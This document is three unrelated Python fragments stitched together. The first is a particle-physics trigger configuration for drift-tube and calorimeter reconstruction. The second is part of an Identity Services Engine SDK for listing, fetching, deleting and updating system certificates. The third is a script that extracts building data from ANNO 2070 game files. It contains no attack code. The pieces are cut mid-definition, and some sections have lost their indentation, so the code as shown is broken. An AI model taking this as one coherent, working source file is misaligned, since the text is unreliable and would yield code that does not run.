        doVdriftCorr = cms.bool(True),
        maxTime = cms.double(420.0),
        minTime = cms.double(-3.0),
        stepTwoFromDigi = cms.bool(False),
        tTrigMode = cms.string('DTTTrigSyncFromDB'),
        tTrigModeConfig = cms.PSet(
            debug = cms.untracked.bool(False),
            doT0Correction = cms.bool(True),
            doTOFCorrection = cms.bool(True),
            doWirePropCorrection = cms.bool(True),
            tTrigLabel = cms.string(''),
            tofCorrType = cms.int32(0),
            vPropWire = cms.double(24.4),
            wirePropCorrType = cms.int32(0)
        ),
        useUncertDB = cms.bool(True)
    )
)
# Build 4D DT segments; the same recAlgoConfig PSet is duplicated for the
# 2D sub-algorithm and the 4D combinatorial step.
process.hltDt4DSegments = cms.EDProducer("DTRecSegment4DProducer",
    Reco4DAlgoConfig = cms.PSet(
        AllDTRecHits = cms.bool(True),
        Reco2DAlgoConfig = cms.PSet(
            AlphaMaxPhi = cms.double(1.0),
            AlphaMaxTheta = cms.double(0.9),
            MaxAllowedHits = cms.uint32(50),
            debug = cms.untracked.bool(False),
            hit_afterT0_resolution = cms.double(0.03),
            nSharedHitsMax = cms.int32(2),
            nUnSharedHitsMin = cms.int32(2),
            performT0SegCorrection = cms.bool(False),
            performT0_vdriftSegCorrection = cms.bool(False),
            perform_delta_rejecting = cms.bool(False),
            recAlgo = cms.string('DTLinearDriftFromDBAlgo'),
            recAlgoConfig = cms.PSet(
                debug = cms.untracked.bool(False),
                doVdriftCorr = cms.bool(True),
                maxTime = cms.double(420.0),
                minTime = cms.double(-3.0),
                stepTwoFromDigi = cms.bool(False),
                tTrigMode = cms.string('DTTTrigSyncFromDB'),
                tTrigModeConfig = cms.PSet(
                    debug = cms.untracked.bool(False),
                    doT0Correction = cms.bool(True),
                    doTOFCorrection = cms.bool(True),
                    doWirePropCorrection = cms.bool(True),
                    tTrigLabel = cms.string(''),
                    tofCorrType = cms.int32(0),
                    vPropWire = cms.double(24.4),
                    wirePropCorrType = cms.int32(0)
                ),
                useUncertDB = cms.bool(True)
            ),
            segmCleanerMode = cms.int32(2)
        ),
        Reco2DAlgoName = cms.string('DTCombinatorialPatternReco'),
        debug = cms.untracked.bool(False),
        hit_afterT0_resolution = cms.double(0.03),
        nSharedHitsMax = cms.int32(2),
        nUnSharedHitsMin = cms.int32(2),
        performT0SegCorrection = cms.bool(False),
        performT0_vdriftSegCorrection = cms.bool(False),
        perform_delta_rejecting = cms.bool(False),
        recAlgo = cms.string('DTLinearDriftFromDBAlgo'),
        recAlgoConfig = cms.PSet(
            debug = cms.untracked.bool(False),
            doVdriftCorr = cms.bool(True),
            maxTime = cms.double(420.0),
            minTime = cms.double(-3.0),
            stepTwoFromDigi = cms.bool(False),
            tTrigMode = cms.string('DTTTrigSyncFromDB'),
            tTrigModeConfig = cms.PSet(
                debug = cms.untracked.bool(False),
                doT0Correction = cms.bool(True),
                doTOFCorrection = cms.bool(True),
                doWirePropCorrection = cms.bool(True),
                tTrigLabel = cms.string(''),
                tofCorrType = cms.int32(0),
                vPropWire = cms.double(24.4),
                wirePropCorrType = cms.int32(0)
            ),
            useUncertDB = cms.bool(True)
        ),
        segmCleanerMode = cms.int32(2)
    ),
    Reco4DAlgoName = cms.string('DTCombinatorialPatternReco4D'),
    debug = cms.untracked.bool(False),
    recHits1DLabel = cms.InputTag("hltDt1DRecHits"),
    recHits2DLabel = cms.InputTag("dt2DSegments")
)
# Collect ECAL channels/towers flagged with integrity errors so the rec-hit
# step can attempt recovery.
process.hltEcalDetIdToBeRecovered = cms.EDProducer("EcalDetIdToBeRecoveredProducer",
    ebDetIdToBeRecovered = cms.string('ebDetId'),
    ebFEToBeRecovered = cms.string('ebFE'),
    ebIntegrityChIdErrors = cms.InputTag("hltEcalDigis","EcalIntegrityChIdErrors"),
    ebIntegrityGainErrors = cms.InputTag("hltEcalDigis","EcalIntegrityGainErrors"),
    ebIntegrityGainSwitchErrors = cms.InputTag("hltEcalDigis","EcalIntegrityGainSwitchErrors"),
    ebSrFlagCollection = cms.InputTag("hltEcalDigis"),
    eeDetIdToBeRecovered = cms.string('eeDetId'),
    eeFEToBeRecovered = cms.string('eeFE'),
    eeIntegrityChIdErrors = cms.InputTag("hltEcalDigis","EcalIntegrityChIdErrors"),
    eeIntegrityGainErrors = cms.InputTag("hltEcalDigis","EcalIntegrityGainErrors"),
    eeIntegrityGainSwitchErrors = cms.InputTag("hltEcalDigis","EcalIntegrityGainSwitchErrors"),
    eeSrFlagCollection = cms.InputTag("hltEcalDigis"),
    integrityBlockSizeErrors = cms.InputTag("hltEcalDigis","EcalIntegrityBlockSizeErrors"),
    integrityTTIdErrors = cms.InputTag("hltEcalDigis","EcalIntegrityTTIdErrors")
)
# Unpack raw ECAL data (FEDs 601-654) into digis; FED and DCC id lists are
# kept in matching order.
process.hltEcalDigis = cms.EDProducer("EcalRawToDigi",
    DoRegional = cms.bool(False),
    FEDs = cms.vint32(601, 602, 603, 604, 605,
        606, 607, 608, 609, 610,
        611, 612, 613, 614, 615,
        616, 617, 618, 619, 620,
        621, 622, 623, 624, 625,
        626, 627, 628, 629, 630,
        631, 632, 633, 634, 635,
        636, 637, 638, 639, 640,
        641, 642, 643, 644, 645,
        646, 647, 648, 649, 650,
        651, 652, 653, 654),
    FedLabel = cms.InputTag("listfeds"),
    InputLabel = cms.InputTag("rawDataCollector"),
    eventPut = cms.bool(True),
    feIdCheck = cms.bool(True),
    feUnpacking = cms.bool(True),
    forceToKeepFRData = cms.bool(False),
    headerUnpacking = cms.bool(True),
    memUnpacking = cms.bool(True),
    numbTriggerTSamples = cms.int32(1),
    numbXtalTSamples = cms.int32(10),
    orderedDCCIdList = cms.vint32(1, 2, 3, 4, 5,
        6, 7, 8, 9, 10,
        11, 12, 13, 14, 15,
        16, 17, 18, 19, 20,
        21, 22, 23, 24, 25,
        26, 27, 28, 29, 30,
        31, 32, 33, 34, 35,
        36, 37, 38, 39, 40,
        41, 42, 43, 44, 45,
        46, 47, 48, 49, 50,
        51, 52, 53, 54),
    orderedFedList = cms.vint32(601, 602, 603, 604, 605,
        606, 607, 608, 609, 610,
        611, 612, 613, 614, 615,
        616, 617, 618, 619, 620,
        621, 622, 623, 624, 625,
        626, 627, 628, 629, 630,
        631, 632, 633, 634, 635,
        636, 637, 638, 639, 640,
        641, 642, 643, 644, 645,
        646, 647, 648, 649, 650,
        651, 652, 653, 654),
    silentMode = cms.untracked.bool(True),
    srpUnpacking = cms.bool(True),
    syncCheck = cms.bool(True),
    tccUnpacking = cms.bool(True)
)
# Unpack raw ECAL preshower data into digis.
process.hltEcalPreshowerDigis = cms.EDProducer("ESRawToDigi",
    ESdigiCollection = cms.string(''),
    InstanceES = cms.string(''),
    LookupTable = cms.FileInPath('EventFilter/ESDigiToRaw/data/ES_lookup_table.dat'),
    debugMode = cms.untracked.bool(False),
    sourceTag = cms.InputTag("rawDataCollector")
)
# Build preshower rec hits from the preshower digis.
process.hltEcalPreshowerRecHit = cms.EDProducer("ESRecHitProducer",
    ESRecoAlgo = cms.int32(0),
    ESdigiCollection = cms.InputTag("hltEcalPreshowerDigis"),
    ESrechitCollection = cms.string('EcalRecHitsES'),
    algo = cms.string('ESRecHitWorker')
)
# Calibrate ECAL uncalibrated rec hits into EB/EE rec-hit collections,
# applying laser corrections, spike cleaning, and dead-channel recovery
# for the det-ids collected by hltEcalDetIdToBeRecovered.
process.hltEcalRecHit = cms.EDProducer("EcalRecHitProducer",
    ChannelStatusToBeExcluded = cms.vstring(),
    EBLaserMAX = cms.double(3.0),
    EBLaserMIN = cms.double(0.5),
    EBrechitCollection = cms.string('EcalRecHitsEB'),
    EBuncalibRecHitCollection = cms.InputTag("hltEcalUncalibRecHit","EcalUncalibRecHitsEB"),
    EELaserMAX = cms.double(8.0),
    EELaserMIN = cms.double(0.5),
    EErechitCollection = cms.string('EcalRecHitsEE'),
    EEuncalibRecHitCollection = cms.InputTag("hltEcalUncalibRecHit","EcalUncalibRecHitsEE"),
    algo = cms.string('EcalRecHitWorkerSimple'),
    algoRecover = cms.string('EcalRecHitWorkerRecover'),
    cleaningConfig = cms.PSet(
        cThreshold_barrel = cms.double(4.0),
        cThreshold_double = cms.double(10.0),
        cThreshold_endcap = cms.double(15.0),
        e4e1Threshold_barrel = cms.double(0.08),
        e4e1Threshold_endcap = cms.double(0.3),
        e4e1_a_barrel = cms.double(0.04),
        e4e1_a_endcap = cms.double(0.02),
        e4e1_b_barrel = cms.double(-0.024),
        e4e1_b_endcap = cms.double(-0.0125),
        e6e2thresh = cms.double(0.04),
        ignoreOutOfTimeThresh = cms.double(1000000000.0),
        tightenCrack_e1_double = cms.double(2.0),
        tightenCrack_e1_single = cms.double(2.0),
        tightenCrack_e4e1_single = cms.double(3.0),
        tightenCrack_e6e2_double = cms.double(3.0)
    ),
    dbStatusToBeExcludedEB = cms.vint32(14, 78, 142),
    dbStatusToBeExcludedEE = cms.vint32(14, 78, 142),
    ebDetIdToBeRecovered = cms.InputTag("hltEcalDetIdToBeRecovered","ebDetId"),
    ebFEToBeRecovered = cms.InputTag("hltEcalDetIdToBeRecovered","ebFE"),
    eeDetIdToBeRecovered = cms.InputTag("hltEcalDetIdToBeRecovered","eeDetId"),
    eeFEToBeRecovered = cms.InputTag("hltEcalDetIdToBeRecovered","eeFE"),
    flagsMapDBReco = cms.PSet(
        kDead = cms.vstring('kNoDataNoTP'),
        kGood = cms.vstring('kOk',
            'kDAC',
            'kNoLaser',
            'kNoisy'),
        kNeighboursRecovered = cms.vstring('kFixedG0',
            'kNonRespondingIsolated',
            'kDeadVFE'),
        kNoisy = cms.vstring('kNNoisy',
            'kFixedG6',
            'kFixedG1'),
        kTowerRecovered = cms.vstring('kDeadFE')
    ),
    killDeadChannels = cms.bool(True),
    laserCorrection = cms.bool(True),
    logWarningEtThreshold_EB_FE = cms.double(50.0),
    logWarningEtThreshold_EE_FE = cms.double(50.0),
    recoverEBFE = cms.bool(True),
    recoverEBIsolatedChannels = cms.bool(False),
    recoverEBVFE = cms.bool(False),
    recoverEEFE = cms.bool(True),
    recoverEEIsolatedChannels = cms.bool(False),
    recoverEEVFE = cms.bool(False),
    singleChannelRecoveryMethod = cms.string('NeuralNetworks'),
    singleChannelRecoveryThreshold = cms.double(8.0),
    triggerPrimitiveDigiCollection = cms.InputTag("hltEcalDigis","EcalTriggerPrimitives")
)
process.hltEcalUncalibRecHit = cms.EDProducer("EcalUncalibRecHitProducer",
EBdigiCollection = cms.InputTag("hltEcalDigis","ebDigis"),
EBhitCollection = cms.string('EcalUncalibRecHitsEB'),
EEdigiCollection = cms.InputTag("hltEcalDigis","eeDigis"),
EEhitCollection | |
and Sorting supported on below mentioned
attributes: friendlyName issuedTo issuedBy
validFrom Supported Date Format: yyyy-MM-dd HH:mm:ss
Supported Operators: EQ, NEQ, GT and LT
expirationDate Supported Date Format: yyyy-MM-dd
HH:mm:ss Supported Operators: EQ, NEQ, GT and LT
.
Args:
host_name(basestring): hostName path parameter. Name of
the host of which system certificates
should be returned.
page(int): page query parameter. Page number.
size(int): size query parameter. Number of objects
returned per page.
sort(basestring): sort query parameter. sort type - asc
or desc.
sort_by(basestring): sortBy query parameter. sort column
by which objects needs to be sorted.
filter(basestring, list, set, tuple): filter query
parameter. **Simple
filtering** should be available through
the filter query string parameter. The
structure of a filter is a triplet of
field operator and value separated with
dots. More than one filter can be sent.
The logical operator common to ALL
filter criteria will be by default AND,
and can be changed by using the
"filterType=or" query string parameter.
Each resource Data model description
should specify if an attribute is a
filtered field. (Operator:
Description),
(EQ: Equals), (NEQ: Not
Equals), (GT: Greater
Than), (LT: Less Then),
(STARTSW: Starts With),
(NSTARTSW: Not Starts With),
(ENDSW: Ends With),
(NENDSW: Not Ends With),
(CONTAINS: Contains),
(NCONTAINS: Not Contains),
.
filter_type(basestring): filterType query parameter. The
logical operator common to ALL filter
criteria will be by default AND, and can
be changed by using the parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
pass
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
check_type(page, (int, basestring, list))
check_type(size, (int, basestring, list))
check_type(sort, basestring)
check_type(sort_by, basestring)
check_type(filter, (basestring, list, set, tuple))
check_type(filter_type, basestring)
check_type(host_name, basestring,
may_be_none=False)
_params = {
'page':
page,
'size':
size,
'sort':
sort,
'sortBy':
sort_by,
'filter':
filter,
'filterType':
filter_type,
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
'hostName': host_name,
}
e_url = ('/api/v1/certs/system-certificate/{hostName}')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_a56f5c5f739a83e8806da16be5_v3_0_0', _api_response)
def get_all_system_certificates_generator(self,
                                          host_name,
                                          filter=None,
                                          filter_type=None,
                                          page=None,
                                          size=None,
                                          sort=None,
                                          sort_by=None,
                                          headers=None,
                                          **query_parameters):
    """Generator version of ``get_all_system_certificates``.

    Lazily pages through every system certificate of the given host by
    following the response's ``nextPage.href`` link, yielding one
    RestResponse per page. The same filtering, sorting and pagination
    query parameters as the non-generator call are supported: filtering
    and sorting work on friendlyName, issuedTo, issuedBy, validFrom and
    expirationDate (dates as ``yyyy-MM-dd HH:mm:ss`` with EQ, NEQ, GT,
    LT operators).

    Args:
        host_name(basestring): hostName path parameter. Name of the host
            of which system certificates should be returned.
        page(int): page query parameter. Page number.
        size(int): size query parameter. Number of objects returned per
            page.
        sort(basestring): sort query parameter. sort type - asc or desc.
        sort_by(basestring): sortBy query parameter. sort column by which
            objects needs to be sorted.
        filter(basestring, list, set, tuple): filter query parameter.
            Triplets of field.operator.value; multiple filters may be
            sent. Operators: EQ, NEQ, GT, LT, STARTSW, NSTARTSW, ENDSW,
            NENDSW, CONTAINS, NCONTAINS.
        filter_type(basestring): filterType query parameter. Logical
            operator joining all filter criteria (default AND, may be
            set to OR).
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        **query_parameters: Additional query parameters (provides support
            for parameters that may be added in the future).

    Returns:
        Generator: yields RestResponse objects with headers, response,
        content and text properties.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the Identity Services Engine cloud returns an error.
    """
    # NOTE: headers is deliberately not forwarded here; each underlying
    # call receives only the query/path arguments, matching the
    # non-generator endpoint's pagination helper contract.
    request_kwargs = dict(
        host_name=host_name,
        filter=filter,
        filter_type=filter_type,
        page=page,
        size=size,
        sort=sort,
        sort_by=sort_by,
        **query_parameters
    )
    yield from get_next_page(self.get_all_system_certificates,
                             request_kwargs,
                             access_next_list=["nextPage", "href"])
def get_system_certificate_by_id(self,
                                 host_name,
                                 id,
                                 headers=None,
                                 **query_parameters):
    """Get the system certificate of a particular node by ID.

    Args:
        host_name(basestring): hostName path parameter. Name of the host
            of which system certificates should be returned.
        id(basestring): id path parameter. The id of the system
            certificate.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        **query_parameters: Additional query parameters (provides support
            for parameters that may be added in the future).

    Returns:
        RestResponse: REST response with following properties:
            - headers(MyDict): response headers.
            - response(MyDict): response body as a MyDict object. Access
              the object's properties by using the dot notation or the
              bracket notation.
            - content(bytes): representation of the request's response.
            - text(str): representation of the request's response.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the Identity Services Engine cloud returns an error.
    """
    # Removed a dead `if headers is not None: pass` branch that had no
    # effect; type validation below is unchanged.
    check_type(headers, dict)
    # Merge caller-supplied headers on top of the session defaults.
    with_custom_headers = False
    _headers = self._session.headers or {}
    if headers:
        _headers.update(dict_of_str(headers))
        with_custom_headers = True
    check_type(host_name, basestring,
               may_be_none=False)
    check_type(id, basestring,
               may_be_none=False)
    # No documented query parameters for this endpoint; forward only
    # caller-provided extras (None values are dropped by the helper).
    _params = {}
    _params.update(query_parameters)
    _params = dict_from_items_with_values(_params)
    path_params = {
        'hostName': host_name,
        'id': id,
    }
    e_url = ('/api/v1/certs/system-certificate/{hostName}/{id}')
    endpoint_full_url = apply_path_params(e_url, path_params)
    if with_custom_headers:
        _api_response = self._session.get(endpoint_full_url, params=_params,
                                          headers=_headers)
    else:
        _api_response = self._session.get(endpoint_full_url, params=_params)
    return self._object_factory('bpm_f36e90115b05416a71506061fed7e5c_v3_0_0', _api_response)
def delete_system_certificate_by_id(self,
                                    host_name,
                                    id,
                                    headers=None,
                                    **query_parameters):
    """Delete a System Certificate by ID and hostname.

    Args:
        host_name(basestring): hostName path parameter. Name of the host
            from which the System Certificate needs to be deleted.
        id(basestring): id path parameter. The ID of the System
            Certificate to be deleted.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        **query_parameters: Additional query parameters (provides support
            for parameters that may be added in the future).

    Returns:
        RestResponse: REST response with following properties:
            - headers(MyDict): response headers.
            - response(MyDict): response body as a MyDict object. Access
              the object's properties by using the dot notation or the
              bracket notation.
            - content(bytes): representation of the request's response.
            - text(str): representation of the request's response.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the Identity Services Engine cloud returns an error.
    """
    # Removed a dead `if headers is not None: pass` branch that had no
    # effect; type validation below is unchanged.
    check_type(headers, dict)
    # Merge caller-supplied headers on top of the session defaults.
    with_custom_headers = False
    _headers = self._session.headers or {}
    if headers:
        _headers.update(dict_of_str(headers))
        with_custom_headers = True
    check_type(host_name, basestring,
               may_be_none=False)
    check_type(id, basestring,
               may_be_none=False)
    # No documented query parameters for this endpoint; forward only
    # caller-provided extras (None values are dropped by the helper).
    _params = {}
    _params.update(query_parameters)
    _params = dict_from_items_with_values(_params)
    path_params = {
        'hostName': host_name,
        'id': id,
    }
    e_url = ('/api/v1/certs/system-certificate/{hostName}/{id}')
    endpoint_full_url = apply_path_params(e_url, path_params)
    if with_custom_headers:
        _api_response = self._session.delete(endpoint_full_url, params=_params,
                                             headers=_headers)
    else:
        _api_response = self._session.delete(endpoint_full_url, params=_params)
    return self._object_factory('bpm_dc2eec65ad680a3c5de47cd87c8_v3_0_0', _api_response)
def update_system_certificate(self,
host_name,
id,
admin=None,
allow_replacement_of_portal_group_tag=None,
description=None,
eap=None,
expiration_ttl_period=None,
expiration_ttl_units=None,
ims=None,
name=None,
portal=None,
portal_group_tag=None,
pxgrid=None,
radius=None,
renew_self_signed_certificate=None,
saml=None,
headers=None,
payload=None,
active_validation=True,
**query_parameters):
"""Purpose of the API is to update data for existing system
certificate.
Args:
admin(boolean): Use certificate to authenticate the ISE
Admin Portal, property of the request
body.
allow_replacement_of_portal_group_tag(boolean): Allow
Replacement of Portal Group Tag
(required), property of the request
| |
'''
Created on 13.12.2011
@author: <EMAIL>
'''
from __future__ import division
import json, re #, sys
from xml.etree import ElementTree as ET
__version__ = "0.3"
# --- global settings ---------------------------------------------------------
# All paths are hard-coded to one local ANNO 2070 installation.
# NOTE: the .txt loca files must first be re-encoded from UCS-2 to ANSI by
# hand; the .xml files can be read as-is.
folder = "C:\\Users\\Peter\\Documents\\ANNO 2070\\"
assets_path = folder + "patch3data\\config\\game\\assets.xml"
icons_txt_path = folder + "eng1\\loca\\eng\\txt\\icons.txt"
guids_txt_path = folder + "eng1\\loca\\eng\\txt\\guids.txt"
properties_path = folder + "patch3data\\config\\game\\properties.xml"
icons_path = folder + "patch3data\\config\\game\\icons.xml"
IconWikiaFilessource_path = folder + "wikia_icons_source.txt"
IconWikiaFiles_path = folder + "wikia_icons_map.csv"
# Output artifacts: the generated building list, its model schema file, and
# the URL where the model is published.
output_name = "list_of_buildings_v" + __version__ + ".json"
model_name = "list_of_buildings_model_v" + __version__ + ".json"
model_url = "http://aprilboy.e404.sk/anno2070/" + model_name
def get_building_list():
AssetGroups = ET.parse(assets_path).findall(".//Group")
IconFileNames = parse_IconFileNames()
IconWikiaFiles = parse_IconWikiaFiles()
Eng1 = parse_Eng1()
ProductGUIDs = parse_ProductGUIDs()
BaseGoldPrices = parse_BaseGoldPrices()
Unlocks = parse_Unlocks()
buildings = []
for top_group in AssetGroups:
if top_group.find("Name").text == "Buildings":
break
for faction in top_group.findall("Groups/Group"):
faction_name = faction.find("Name").text
for group in faction.findall(".//Groups/Group"):
group_name = group.find("Name").text
if group_name == "farmfield":
group_name = "farmfields"
for asset in group.findall("Assets/Asset"):
try:
template = asset.find("Template").text
if template == "SimpleObject": # SimpleObjects (farm_field_rows and pirates_props) won't be needed in this database
continue
except: # scientist_academy does not have a Template, so let's ignore it ...
continue
GUID = int(asset.find("Values/Standard/GUID").text)
Name = asset.find("Values/Standard/Name").text
b = {"GUID": GUID, "Name": Name}
try: b["Eng1"] = Eng1[GUID]
except: pass
try: b["IconFileName"] = IconFileNames[GUID]
except: pass
try: b["IconWikiaFile"] = IconWikiaFiles[Name]
except: pass
try: b["Faction"] = faction_name
except: pass
try: b["Group"] = group_name
except: pass
try: b["Template"] = template
except: pass
try: b["InfluenceRadius"] = int(asset.find("Values/Influence/InfluenceRadius").text)
except: pass
try: b[".ifo"] = asset.find("Values/Object/Variations/Item/Filename").text.replace(".cfg",".ifo").replace("data\\graphics\\buildings\\", "")
except: pass
try: b["MaxResidentCount"] = int(asset.find("Values/ResidenceBuilding/MaxResidentCount").text)
except: pass
try:
(x, z) = get_BuildBlocker( b[".ifo"] )
b["BuildBlocker.x"] = x
b["BuildBlocker.z"] = z
except: pass
try:
b["FarmField.GUID"] = int(asset.find("Values/Farm/FarmFieldGUID").text)
try: b["FarmField.Count"] = int(asset.find("Values/Farm/FarmfieldCount").text)
except: pass
try: b["FarmField.Fertility"] = asset.find("Values/Farm/Fertility").text
except: pass
try:
# this split and join is to add "_field" to the .ifo filename
farmifo = b[".ifo"].split("\\")
for i in range(-2,0):
f = farmifo[i].split("_")
farmifo[i] = "_".join(f[0:-1] + ["field"] + [f[-1]])
farmifo = "\\".join(farmifo).replace("tycoon.ifo", "tycoons.ifo") # tycoon do not have consistend .ifo filenames for fields
(x, z) = get_BuildBlocker( farmifo )
b["FarmField.BuildBlocker.x"] = x
b["FarmField.BuildBlocker.z"] = z
except: pass
except: pass
try:
b["Production.Product.Name"] = asset.find("Values/WareProduction/Product").text
#default values:
b["Production.ProductionTime"] = 20000 #miliseconds
b["Production.ProductionCount"] = 1000 #kilograms
b["Production.RawNeeded1"] = 1000
b["Production.RawNeeded2"] = 1000
try: b["Production.Product.GUID"] = ProductGUIDs[ b["Production.Product.Name"] ]
except: pass
try: b["Production.Product.BaseGoldPrice"] = BaseGoldPrices[ b["Production.Product.Name"] ]
except: pass
try: b["Production.Product.Eng1"] = Eng1[ b["Production.Product.GUID"] ]
except: pass
try: b["Production.ProductionTime"] = int(asset.find("Values/WareProduction/ProductionTime").text)
except: pass
try: b["Production.ProductionCount"] = int(asset.find("Values/WareProduction/ProductionCount").text)
except: pass
try: b["Production.RawMaterial1"] = asset.find("Values/Factory/RawMaterial1").text
except: del b["Production.RawNeeded1"]
try: b["Production.RawMaterial2"] = asset.find("Values/Factory/RawMaterial2").text
except: del b["Production.RawNeeded2"]
try: b["Production.RawNeeded1"] = int(asset.find("Values/Factory/RawNeeded1").text)
except: pass
try: b["Production.RawNeeded2"] = int(asset.find("Values/Factory/RawNeeded2").text)
except: pass
TicksPerMinute = 60000 / b["Production.ProductionTime"]
b["Production.ProductionTonsPerMinute"] = ( b["Production.ProductionCount"] / 1000 ) * TicksPerMinute
try: b["Production.RawNeeded1TonsPerMinute"] = ( b["Production.RawNeeded1"] / 1000 ) * b["Production.ProductionTonsPerMinute"]
except: pass
try: b["Production.RawNeeded2TonsPerMinute"] = ( b["Production.RawNeeded2"] / 1000 ) * b["Production.ProductionTonsPerMinute"]
except: pass
except: pass
try:
for cost in asset.findall("Values/BuildCost/*/*"):
try:
if cost.tag == "Credits":
b["BuildCost." + cost.tag] = int(cost.text)
else:
b["BuildCost." + cost.tag] = int(cost.text) // 1000 # in tons
except: pass
except: pass
try:
for cost in asset.findall("Values/MaintenanceCost/*"):
try:
c = int(cost.text)
if "Cost" in cost.tag:
c = -c
if c % (2 << 10):
b["MaintenanceCost." + cost.tag] = c # in Credits
else:
b["MaintenanceCost." + cost.tag] = c >> 12 # in game eco / power / ... units
except: pass
except: pass
try:
b["Unlock.IntermediateLevel"] = asset.find("Values/BuildCost/NeedsIntermediatelevel").text
(count, level) = Unlocks[ b["Unlock.IntermediateLevel"] ]
b["Unlock.ResidentCount"] = count
b["Unlock.ResidentLevel"] = level
except: pass
buildings.append(b)
return buildings
#===============================================================================
def parse_Eng1():
    """Parse English display names keyed by GUID from icons.txt and guids.txt.

    Returns:
        dict[int, str]: GUID -> English name.  Entries parsed later
        (guids.txt) overwrite duplicate GUIDs from icons.txt.
    """
    Eng1 = {}
    # Relevant lines have the form "<GUID>=<English name>".  \d+ (not \d*)
    # so a line whose '=' is not preceded by digits cannot match with an
    # empty group and crash int('').  Compiled once instead of per line.
    pattern = re.compile(r"(\d+)=(.*)")
    for path in (icons_txt_path, guids_txt_path):
        # 'with' guarantees the handle is closed (the original leaked both files).
        with open(path) as f:
            for line in f:
                result = pattern.search(line)
                if result:
                    Eng1[int(result.group(1))] = result.group(2)
    return Eng1
def parse_ProductGUIDs():
    """Map product tag names to their icon GUIDs from properties.xml.

    The "icon" child elements themselves are skipped; only the product
    wrapper tags become keys.
    """
    tree = ET.parse(properties_path)
    return {
        node.tag: int(node.find("icon").text)
        for node in tree.findall(".//ProductIconGUID/*")
        if node.tag != "icon"
    }
def parse_BaseGoldPrices():
    """Map product tag names to base gold prices, scaled to trade prices.

    The datafile stores a raw BaseGoldPrice; the value recorded here is
    int(raw * 2.5), matching the in-game default trade price.  Products
    without a usable BaseGoldPrice element are skipped.
    """
    BaseGoldPrices = {}
    for p in ET.parse(properties_path).findall(".//ProductPrices/*"):
        price_node = p.find("BaseGoldPrice")
        if price_node is None:
            # Product without a price entry - skip it explicitly instead
            # of hiding arbitrary failures behind a bare except.
            continue
        try:
            BaseGoldPrices[p.tag] = int(int(price_node.text) * 2.5)
        except (TypeError, ValueError):
            # Empty or non-numeric price text - ignore this product.
            pass
    return BaseGoldPrices
def parse_IconFileNames():
    """Build icon filenames ("icon_<fileID>_<index>.png") keyed by GUID.

    Icons without an explicit IconIndex element default to index "0".
    """
    prefix = "icon_"
    midfix = "_"
    postfix = ".png"
    IconFileNames = {}
    for i in ET.parse(icons_path).findall("i"):
        IconFileID = i.find("Icons/i/IconFileID").text
        # Explicit None check instead of the original bare except, which
        # also hid unrelated errors.
        index_node = i.find("Icons/i/IconIndex")
        IconIndex = index_node.text if index_node is not None else "0"
        IconFileNames[int(i.find("GUID").text)] = prefix + IconFileID + midfix + IconIndex + postfix
    return IconFileNames
def parse_IconWikiaFiles():
    """Read the Name -> wikia icon file mapping from the semicolon CSV.

    The first line of the file holds column headers and is skipped;
    the first two fields of each row become key and value.
    """
    mapping = {}
    with open(IconWikiaFiles_path) as csv_file:
        csv_file.readline()  # header row
        for row in csv_file:
            key, value = row.strip().replace("\"", "").split(";")[0:2]
            mapping[key] = value
    return mapping
def parse_IconWikiaFilesSource():
    """Build the "Name;Wikia Icon File;Wikia Label" CSV text.

    For each "<png>|<label>" line of the wikia source dump, tries to
    match the icon to a known building by comparing normalised variants
    of the building's names (Name, Eng1, known wikia file, product
    names, icon file name) against the label and the png basename.
    Icons that match no building get an empty Name column.
    """
    buildings = get_building_list()
    WikiaCSVString = "Name;Wikia Icon File;Wikia Label\n"
    def prep(string):
        # Normalise for fuzzy matching: lowercase, strip spaces,
        # dots, underscores and dashes.
        return re.sub("[ ._-]*", "", string.lower())
    with open(IconWikiaFilessource_path) as f:
        for line in f:
            # Only icon data lines; "File:" lines are wiki markup.
            if ".png" in line and "File:" not in line:
                try:
                    (png, label) = line.strip().replace(";","").split("|")[0:2]
                except:
                    # Line carries no label part - keep it empty.
                    (png, label) = (line.strip().replace(";","").split("|")[0], "")
                name = ""
                for b in buildings:
                    # Candidate normalised names for this building; every
                    # key except "Name" may be absent, hence the chain of
                    # best-effort try/except appends.
                    names = [ prep(b["Name"]) ]
                    try: names.append(prep(b["Eng1"]))
                    except: pass
                    try: names.append(prep(b["IconWikiaFile"]))
                    except: pass
                    try: names.append(prep(b["Production.Product.Name"]))
                    except: pass
                    try: names.append(prep(b["Production.Product.Eng1"]))
                    except: pass
                    try: names.append(prep(b["IconFileName"]))
                    except: pass
                    # Match on either the label or the png basename.
                    if prep(label) in names or prep(png.split(".")[0]) in names:
                        name = b["Name"]
                        break
                WikiaCSVString += "{0};{1};{2}\n".format(name, png, label)
    return WikiaCSVString
def update_IconWikiaFiles():
    """Placeholder: the wikia icon mapping is still maintained by hand."""
    return None
def get_BuildBlocker(detail_path):
    """Return [x, z] build blocker extents read from a building .ifo file.

    Each coordinate is taken as an absolute value and shifted right by
    11 bits (i.e. divided by 2048) to convert from the datafile's
    fixed-point representation.
    """
    ifo_file = folder + "data2\\graphics\\buildings\\" + detail_path
    position = ET.parse(ifo_file).find(".//BuildBlocker/Position")
    return [abs(int(position.find(axis).text)) >> 11 for axis in ("x", "z")]
def parse_Unlocks():
